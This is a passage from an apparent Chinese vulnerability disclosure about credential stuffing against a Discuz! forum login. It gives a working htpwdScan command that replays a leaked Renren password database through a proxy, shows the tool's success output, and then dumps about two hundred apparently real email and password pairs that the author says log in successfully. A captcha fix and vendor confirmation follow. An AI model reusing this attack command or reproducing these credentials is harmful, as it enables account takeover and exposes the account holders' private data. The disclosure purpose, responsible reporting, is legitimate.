href="index.php?m=index.comments" target="_blank" onclick="xwbUnreadCtr.hideContainer('comments');">新增评论: <span id="xwb_comments_29493546">0</span></a></li>\r\n<li id="xwb_mentions_29493546_container" style="display: none"><a href="index.php?m=index.atme" target="_blank" onclick="xwbUnreadCtr.hideContainer('mentions');">@到我的: <span id="xwb_mentions_29493546">0</span></a></li>\r\n<li id="xwb_dm_29493546_container" style="display: none"><a href="index.php?m=index.messages" target="_blank" onclick="xwbUnreadCtr.hideContainer('dm');">未读私信: <span id="xwb_dm_29493546">0</span></a></li>\r\n</ul>\r\n\r\n\r\n<script src="xwb.php?m=xwbSiteInterface.setUnreadCookie" type="text/javascript" type="text/javascript"></script>\r\n\r\n<script src="xwb/images/xwb_unreadctr.js" type="text/javascript" type="text/javascript"></script>\r\n<script type="text/javascript">\r\nxwbUnreadCtr.init(29493546);\r\n</script>\r\n\r\n<div id="ft" class="cl">\r\n<div class="footnav">\r\n<div class="wrapper">\r\n<script type="text/javascript">Footer.GetFooterNav();</script>\r\n<div class="clearfix" style=" height:90px; overflow:hidden;">\r\n<div class="z" id="ad_footerbanner1"></div>\r\n<div class="y" id="ad_footerbanner2"></div>\r\n </div>\r\n <!--footer-->\r\n <div class="cl">\r\n <script type="text/javascript">Footer.GetFooter();</script>\r\n </div>\r\n <!--//footer-->\r\n</div>\r\n</div>\r\n\r\n<div id="flk" class="y">\r\n<p><a href="javascript:;" onclick="showWindow('miscreport', 'misc.php?mod=report&url='+REPORTURL);return false;">举报</a><span class="pipe">|</span><a href="archiver/" >Archiver</a><span class="pipe">|</span><a href="forum.php?mobile=yes" >手机版</a><span class="pipe">|</span><strong><a href="http://bbs.hiapk.com/" target="_blank">安卓网</a></strong>\r\n( <a href="http://www.miitbeian.gov.cn/" target="_blank">闽ICP备09004645号</a> ) <span id="tcss"></span><script type="text/javascript" src="http://tcss.qq.com/ping.js?v=1yvW" charset="utf-8"></script><script type="text/javascript" reload="1">pgvMain({"discuzParams":{"r2":"8520930","ui":"29493546","rt":"member","md":"logging","pn":1,"qq":"010","logo":11},"extraParams":""});</script><script src='http://w.cnzz.com/c.php?id=30033867' language='JavaScript'></script>\r\n<script src='http://w.cnzz.com/c.php?id=30052228' language='JavaScript'></script></p>\r\n<p class="xs0">\r\nGMT+8, 2015-11-20 14:26<span id="debuginfo">\r\n</span>\r\n</p>\r\n</div>\r\n<div id="frt">\r\n<p>Powered by <strong><a href="http://www.discuz.net" target="_blank">Discuz!</a></strong> <em>X2</em></p>\r\n<p class="xs0">© 2001-2011 <a href="http://www.comsenz.com" target="_blank">Comsenz Inc.</a></p>\r\n</div></script>\r\n</div>\r\n<div id="g_upmine_menu" class="tip tip_3" style="display:none;">\r\n<div class="tip_c">\r\n积分 5, 距离下一级还需 45 积分\r\n</div>\r\n<div class="tip_horn"></div>\r\n</div>\r\n<script src="home.php?mod=spacecp&ac=pm&op=checknewpm&rand=1448000801" type="text/javascript"></script>\r\n<script type="text/javascript">noticeTitle();</script>\r\n<span id="scrolltop" onclick="window.scrollTo('0','0')">回顶部</span>\r\n<script type="text/javascript">\r\n_attachEvent(window, 'scroll', function(){showTopLink();});\r\n//_attachEvent(window, 'scroll', function(){setfloat();});\r\n(function(){document.getElementById('___szfw_logo___').oncontextmenu = function(){return false;}})();\r\n</script>\r\n<script>\r\nvar cnzz_s_tag = document.createElement('script');\r\ncnzz_s_tag.type = 'text/javascript';\r\ncnzz_s_tag.async = true;\r\ncnzz_s_tag.src = 'http://s1.cnzz.com/c.php?id=30052228';\r\ncnzz_s_tag.charset = 'utf-8';\r\nvar root_s = document.getElementsByTagName('script')[0];\r\nroot_s.parentNode.insertBefore(cnzz_s_tag, root_s); \r\n\r\nvar cnzz_s_tag = document.createElement('script');\r\ncnzz_s_tag.type = 'text/javascript';\r\ncnzz_s_tag.async = true;\r\ncnzz_s_tag.src = 'http://s1.cnzz.com/c.php?id=30033867';\r\ncnzz_s_tag.charset = 'utf-8';\r\nvar root_s = document.getElementsByTagName('script')[0];\r\nroot_s.parentNode.insertBefore(cnzz_s_tag, root_s);\r\n</script> \r\n\r\n<script src="http://pan.baidu.com/res/static/thirdparty/yunfujian-end/_build/yunfujian.discuz.js?cache=1448000801" type="text/javascript" type="text/javascript"></script>\r\n<script type="text/javascript">\r\n(function() {\r\nif (window.yunfujian) {\r\nif (typeof window.yunfujian.runDiscuz === "function") {\r\nwindow.yunfujian.runDiscuz();\r\n}\r\nif (typeof window.yunfujian.render === "function") {\r\nwindow.yunfujian.render();\r\n}\r\n}\r\n})();\r\n</script>\r\n<script type='text/javascript' src='http://agency.hiapk.com/www/delivery/spcjs_async_ex_bbs.php?id=2' defer="defer"></script>\r\n</body>\r\n\r\n</html>\r\n***********************************************************************************************************************************************[+OK]username=woooyun@qq.com&password=woooyun_______________________________________________________________________________________________________________________________________________Task finished at 14:26:45. Cost 13.74 secondsCracked 1 item(s) in total.msl@msl-ubuntu:~/htpwdScan$
-f从文件加载请求 username,password=xxx 这个不用解释了吧 -regex="(\S+)\s+(\S+)" 判断xxx文件中格式用的 -err是错误标识 很明显 返回的数据中没有这句话 所以程序认为登陆成功 但是这还不够 我们明显看到返回数据中有一句“欢迎您回来” ok 我们就用它做登陆成功的标识 只有返回数据中包含这句话 我们才让程序认为登陆成功然后 我们拿出RR网N年前泄露的数据
如上图 数据量多少就不说了 格式是“账号+空格+密码” 然后 我们把-err换成-suc 登陆成功的标识 我们开始 呃还有账号密码的文件、、、
./htpwdScan.py -f=test -database username,password=renren.com.txt -regex="(\S+)\s+(\S+)" -suc="欢迎您回来" -fip -proxy=192.168.0.187:808
不到一分钟(也可以说也就二十多秒) 结果如下
217条 就不继续了duang了
350191363@qq.com 19860216zjkbayy@sina.com 8891369htt83174120@126.com hantongfanti.student@sina.com 841030zhaibaby@126.com 19821010p278283224@qq.com 1991621494084700@qq.com 13862598923441905149@qq.com 7758258350191363@qq.com 19860216bill-0138@126.com 23360854airatone@126.com 198644datezjkbayy@sina.com 8891369zxc2531826@126.com 2531826htt83174120@126.com hantongfanti.student@sina.com 841030bfb147@sina.com 1470807285300892@qq.com 5534884327580882@QQ.com 3893037494084700@qq.com 13862598923zhaibaby@126.com 19821010mynamezth@sina.com 6374705941p278283224@qq.com 1991621441905149@qq.com 7758258yuq0@sina.com mianfeiunstray@gmail.com woshinibabill-0138@126.com 23360854350191363@qq.com 19860216zxc2531826@126.com 2531826424466022@qq.com 2563094htt83174120@126.com hantongairatone@126.com 198644datezjkbayy@sina.com 8891369285300892@qq.com 5534884fanti.student@sina.com 841030panyi5517@yahoo.com.cn 6294605bfb147@sina.com 1470807327580882@QQ.com 3893037454818938@qq.COM 4064608494084700@qq.com 13862598923mynamezth@sina.com 6374705941cat100.student@sina.com 3325884p278283224@qq.com 1991621zhaibaby@126.com 19821010122663500@qq.com 19870624441905149@qq.com 7758258yuq0@sina.com mianfei350191363@qq.com 19860216bill-0138@126.com 23360854unstray@gmail.com woshinibazxc2531826@126.com 2531826htt83174120@126.com hantong424466022@qq.com 2563094taishan22937@sohu.com 13012637zjkbayy@sina.com 8891369airatone@126.com 198644date285300892@qq.com 5534884luwenfeng1985@sina.com 136055fanti.student@sina.com 841030bfb147@sina.com 1470807panyi5517@yahoo.com.cn 6294605327580882@QQ.com 3893037gao1kai@126.com 457259726122663500@qq.com 19870624cat100.student@sina.com 3325884454818938@qq.COM 4064608494084700@qq.com 13862598923mynamezth@sina.com 6374705941l48894932@126.com qianqian441905149@qq.com 7758258zhaibaby@126.com 19821010350191363@qq.com 19860216unstray@gmail.com woshinibap278283224@qq.com 1991621yuq0@sina.com mianfeibill-0138@126.com 23360854zealot4@126.com 302576891zxc2531826@126.com 2531826424466022@qq.com 2563094taishan22937@sohu.com 13012637vkbshfm@qq.com 43674213htt83174120@126.com hantongairatone@126.com 198644dateluwenfeng1985@sina.com 136055zjkbayy@sina.com 8891369bfb147@sina.com 1470807panyi5517@yahoo.com.cn 6294605gao1kai@126.com 457259726285300892@qq.com 5534884fanti.student@sina.com 841030327580882@QQ.com 3893037454818938@qq.COM 4064608cat100.student@sina.com 3325884yuq0@sina.com mianfeibill-0138@126.com 23360854122663500@qq.com 1987062477481@sohu.com 8658998unstray@gmail.com woshinibamynamezth@sina.com 6374705941350191363@qq.com 19860216l48894932@126.com qianqian494084700@qq.com 13862598923htt83174120@126.com hantong441905149@qq.com 7758258p278283224@qq.com 1991621zcpu@hotmail.com zjp730205zealot4@126.com 302576891zhaibaby@126.com 19821010vkbshfm@qq.com 43674213zxc2531826@126.com 2531826zjkbayy@sina.com 8891369airatone@126.com 198644datewe_spring@126.com 19891129424466022@qq.com 2563094taishan22937@sohu.com 13012637luwenfeng1985@sina.com 136055gao1kai@126.com 457259726285300892@qq.com 5534884327580882@QQ.com 3893037panyi5517@yahoo.com.cn 6294605fanti.student@sina.com 841030454818938@qq.COM 4064608bfb147@sina.com 1470807cat100.student@sina.com 3325884122663500@qq.com 19870624bill-0138@126.com 23360854yuq0@sina.com mianfei77481@sohu.com 8658998vkbshfm@qq.com 43674213l48894932@126.com qianqianmynamezth@sina.com 6374705941494084700@qq.com 13862598923unstray@gmail.com woshiniba441905149@qq.com 7758258zealot4@126.com 302576891p278283224@qq.com 1991621panyi5517@yahoo.com.cn 6294605zcpu@hotmail.com zjp730205gao1kai@126.com 457259726zxc2531826@126.com 2531826zhaibaby@126.com 19821010we_spring@126.com 19891129luwenfeng1985@sina.com 136055454818938@qq.COM 4064608285300892@qq.com 5534884airatone@126.com 198644date327580882@QQ.com 3893037258917206@qq.com chen123taishan22937@sohu.com 13012637424466022@qq.com 2563094verayang1985@gmail.com chancy11cat100.student@sina.com 3325884bfb147@sina.com 1470807122663500@qq.com 1987062477481@sohu.com 8658998yuq0@sina.com mianfei281490538@qq.com 55155053l48894932@126.com qianqianvkbshfm@qq.com 43674213unstray@gmail.com woshinibazhangjian840427@21cn.com 19840427panyi5517@yahoo.com.cn 6294605mynamezth@sina.com 6374705941gao1kai@126.com 457259726zcpu@hotmail.com zjp730205taishan22937@sohu.com 13012637zealot4@126.com 302576891454818938@qq.COM 4064608luwenfeng1985@sina.com 136055we_spring@126.com 19891129cat100.student@sina.com 3325884424466022@qq.com 2563094258917206@qq.com chen123verayang1985@gmail.com chancy1177481@sohu.com 8658998281490538@qq.com 55155053122663500@qq.com 19870624yulongwu12@126.com 1427231985ychqg@126.com 687898926831195@qq.com 81202561vkbshfm@qq.com 43674213l48894932@126.com qianqiantaishan22937@sohu.com 13012637luwenfeng1985@sina.com 136055gao1kai@126.com 457259726zhangjian840427@21cn.com 19840427zcpu@hotmail.com zjp730205zealot4@126.com 302576891we_spring@126.com 19891129ychqg@126.com 6878989l48894932@126.com qianqian258917206@qq.com chen12326831195@qq.com 81202561449105617@qq.com 1984040777481@sohu.com 8658998yulongwu12@126.com 1427231985xuan88zheng@yahoo.com.cn 5201314verayang1985@gmail.com chancy11281490538@qq.com 5515505356198714@qq.com 56198714vkbshfm@qq.com 43674213282393629@qq.com 23401448zcpu@hotmail.com zjp730205zhangjian840427@21cn.com 1984042726831195@qq.com 81202561zealot4@126.com 302576891we_spring@126.com 19891129xuan88zheng@yahoo.com.cn 5201314yulongwu12@126.com 1427231985258917206@qq.com chen123verayang1985@gmail.com chancy1177481@sohu.com 8658998449105617@qq.com 19840407281490538@qq.com 55155053man520722225@gmail.com 15935700ychqg@126.com 6878989310226429@qq.com 3932021156198714@qq.com 56198714
我们来登录下看看是否正确就拿最后几个为例子
测试两个 都可以登录 其他的你们自己测试 危害显而易见 不到一分钟上百 要是不法分子跑几个小时 更何况现在泄露的数据很多很多……想想后果……rank~~~
添加复杂点验证码 我只想到这个…… 要不来个虹膜识别啥的也行
危害等级:高
漏洞Rank:10
确认时间:2015-11-25 14:06
感谢支持,转百度修复
暂无